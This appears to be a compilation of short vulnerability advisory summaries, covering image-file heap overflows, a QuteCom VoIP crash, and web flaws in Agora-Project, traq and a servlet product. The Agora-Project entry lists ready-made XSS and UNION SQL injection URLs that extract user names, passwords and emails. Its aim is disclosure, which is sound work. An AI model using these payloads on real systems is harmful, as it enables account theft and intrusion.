An indexing error when processing the ImageDescriptor structure of GIF images can be exploited to corrupt memory via a specially crafted 'ImageLeftPosition' value. The vulnerabilities are confirmed in version 1.98.8. Other versions may also be affected.
Insufficient validation in ID_ICO.apl when copying colours from cursors in .CUR files can be exploited to cause a heap-based buffer overflow via a .CUR file containing a specially crafted "ColorsImportant" field value.
An error in IDE_ACDStd.apl when allocating memory based on values in the Logical Screen Descriptor structure of a GIF image and later copying data into the buffer without ensuring that it's adequately sized can be exploited to corrupt heap memory.
Insufficient validation in ID_PICT.apl of specific byte values used as sizes in the image content can be exploited to cause a heap-based buffer overflow via a specially crafted .PCT file.
Insufficient validation in IDE_ACDStd.apl of specific byte values used as sizes in the image content when decompressing run-length encoded bitmaps can be exploited to cause a heap-based buffer overflow via a specially crafted .RLE file.
Agora-Project is an intuitive groupware under GPL (Based on PHP/MySQL). It contains many modules: File Manager (with versioning), Calendars (with resource calendars), Task Manager, Bookmark manager, Contacts, News, Forum, Instant Messaging, etc. Vulnerabilities are XSS, SQLi, BSQLi. XSS exploits include 192.168.0.1/module_utilisateurs/utilisateur.php?id_utilisateur"><script>alert('xss')</script>, 192.168.0.1/module_agenda/evenement.php?id_evenement="<script>alert('xss')</script>, 192.168.0.1/module_contact/contact.php?id_contact="<script>alert('xss')</script>, 192.168.0.1/module_contact/index.php?id_dossier="<script>alert('xss')</script>, 192.168.0.1/module_tache/index.php?id_dossier="<script>alert('xss')</script>, 192.168.0.1/module_agenda/index.php?printmode="<script>alert('xss')</script>, 192.168.0.1/module_lien/index.php?id_dossier="<script>alert('xss')</script>, 192.168.0.1/module_forum/index.php?theme="<script>alert('xss')</script>, 192.168.0.1/module_fichier/index.php?id_dossier="<script>alert('xss')</script>, 192.168.0.1/module_tableau_bord/index.php?tdb_periode="<script>alert('xss')</script>. SQLi exploits include 192.168.0.1/module_forum/index.php?theme=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_forum/index.php?theme=1' aND 1=2 uNION sELECT nom,mdp FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_forum/index.php?theme=1' aND 1=2 uNION sELECT nom,mdp,email FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_forum/index.php?theme=1' aND 1=2 uNION sELECT nom,mdp,email,id_utilisateur FROM gt_utilisateur WHERE 1 AND '1'='1. BSQLi exploits include 192.168.0.1/module_utilisateurs/utilisateur.php?id_utilisateur=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_agenda/evenement.php?id_evenement=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_contact/contact.php?id_contact=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_contact/index.php?id_dossier=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_tache/index.php?id_dossier=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_agenda/index.php?printmode=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_lien/index.php?id_dossier=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_forum/index.php?theme=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_fichier/index.php?id_dossier=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1, 192.168.0.1/module_tableau_bord/index.php?tdb_periode=1' and 1=2 union select nom FROM gt_utilisateur WHERE 1 AND '1'='1.
QuteCom (previously called WengoPhone) is a free software SIP compliant VoIP client developed by the QuteCom (previously OpenWengo) community under the GNU General Public License (GPL). This bug in Qutecom v2.2.1 is caused due to a boundary error in the processing of too long phone number.This heap buffer overflow bug can be triggered by dialing a more than 5000 character phone number or character set form the soft phone. To trigger this bug the application must be connected to a VOIP/SIP server.An Asterisk-based PBX Phone System "TrixBox" was used to test this Crash.
The whole administration interface is prone to several client-side attacks. Examples of the attacks include file deletion vulnerability, Cross Site Scripting, CSRF/Change admin email and password, and CSRF/Add new admin user.
traq-2.3.5 is prone to Cross-Site Request Forgery (CSRF), Cross-Site Scripting (XSS) and SQL injection vulnerabilities. The vulnerable code section is located in the admincp/groups.php file, where the application fails to properly sanitize user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.
Input passed via the GET parameter 'selectedModuleOnly' in 'ModuleServlet.do' script is not properly sanitised before being returned to the user or used in SQL queries. This can be exploited to manipulate SQL queries by injecting arbitrary SQL code. The GET parameter 'updateRegn' in the 'SoftwareRegistration.do' script is vulnerable to a XSS issue where the attacker can execute arbitrary HTML and script code in a user's browser session in context of an affected site.
Services By CQR